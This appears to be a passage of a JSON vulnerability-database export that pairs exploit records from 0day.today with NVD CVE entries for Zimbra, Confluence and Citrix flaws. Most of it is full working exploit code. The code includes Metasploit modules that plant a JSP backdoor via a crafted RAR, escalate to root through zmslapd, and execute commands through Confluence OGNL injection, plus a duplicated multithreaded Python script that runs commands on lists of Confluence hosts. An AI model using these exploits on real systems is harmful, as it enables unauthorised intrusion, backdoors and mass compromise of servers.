\"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\"\n write_file(config_path, config)\n\n write_file(library_path, generate_payload_dll)\n\n cmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\"\n print_status \"Attempting to trigger payload: #{cmd}\"\n out = cmd_exec(cmd)\n\n unless session_created?\n print_error(\"Failed to create session! Cmd output = #{out}\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37907", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:00:33", "description": "This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-07T00:00:00", "type": "zdt", "title": "Zimbra UnRAR Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-07T00:00:00", "id": "1337DAY-ID-37894", "href": "https://0day.today/exploit/description/37894", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that can be emailed to a Zimbra server\n to exploit CVE-2022-30333. If successful, it plants a JSP-based\n backdoor in the public web directory, then executes that backdoor.\n\n The core vulnerability is a path-traversal issue in unRAR that can\n extract an arbitrary file to an arbitrary location on a Linux system.\n\n This issue is exploitable on the following versions of Zimbra, provided\n UnRAR version 6.11 or earlier is installed:\n\n * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',\n 'TARGET_FILENAME' => nil,\n 'DisablePayloadHandler' => false,\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n\n # Separating the path, filename, and extension allows us to randomize the filename\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),\n OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),\n\n # Took this from multi/handler\n OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),\n OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n\n print_good('File created! Email the file above to any user on the target Zimbra server')\n\n # Bail if they don't want the payload triggered\n return unless datastore['TRIGGER_PAYLOAD']\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n print_warning('Could not determine the public web path, disabling payload triggering')\n return\n end\n\n register_file_for_cleanup(target_filename)\n\n interval = datastore['CheckInterval'].to_i\n print_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\")\n\n # This loop is mostly from `multi/handler`\n stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i\n timeout = datastore['ListenerTimeout'].to_i\n loop do\n break if session_created?\n break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')\n end\n\n Rex::ThreadSafe.sleep(interval)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37894", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T18:53:25", "description": "Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Confluence OGNL Injection Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37778", "href": "https://0day.today/exploit/description/37778", "sourceData": "#!/usr/bin/python3\n\n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection\n# Google Dork: N/A\n# Date: 06/006/2022\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37778", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-21T14:42:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "zdt", "title": "Confluence Data Center 7.18.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "1337DAY-ID-37783", "href": "https://0day.today/exploit/description/37783", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\n#!/usr/bin/python3\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37783", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T18:53:25", "description": "This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "zdt", "title": "Atlassian Confluence Namespace OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-09T00:00:00", "id": "1337DAY-ID-37781", "href": "https://0day.today/exploit/description/37781", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n version = get_confluence_version\n return CheckCode::Unknown unless version\n\n vprint_status(\"Detected Confluence version: #{version}\")\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl('', header: header) # empty command works for testing, the header will be set\n\n return CheckCode::Unknown unless res\n\n unless res && res.headers.include?(header)\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl(cmd, header: header)\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(cmd, header:)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),\n 'headers' => { header => cmd }\n )\n end\n\n def ognl_payload(_cmd, header:)\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n end\nend\n", "sourceHref": "https://0day.today/exploit/37781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-03T14:53:53", "description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T15:15:00", "type": "cve", "title": "CVE-2022-37042", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-10-28T13:38:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-37042", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:02", "description": "Corruption of the system by a remote, unauthenticated user. The impact of this can include the reset of the administrator password at the next device reboot, allowing an attacker with ssh access to connect with the default administrator credentials after the device has rebooted.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T19:15:00", "type": "cve", "title": "CVE-2022-27511", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511"], "modified": "2022-06-16T21:57:00", "cpe": [], "id": "CVE-2022-27511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27511", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:54:31", "description": "Zimbra's sudo configuration permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T20:15:00", "type": "cve", "title": "CVE-2022-37393", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-18T17:12:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.7", "cpe:/a:zimbra:collaboration:8.7.7", "cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:8.8.11", "cpe:/a:zimbra:collaboration:8.7.11", "cpe:/a:zimbra:collaboration:8.7.10", "cpe:/a:zimbra:collaboration:8.8.4", "cpe:/a:zimbra:collaboration:8.8.3", 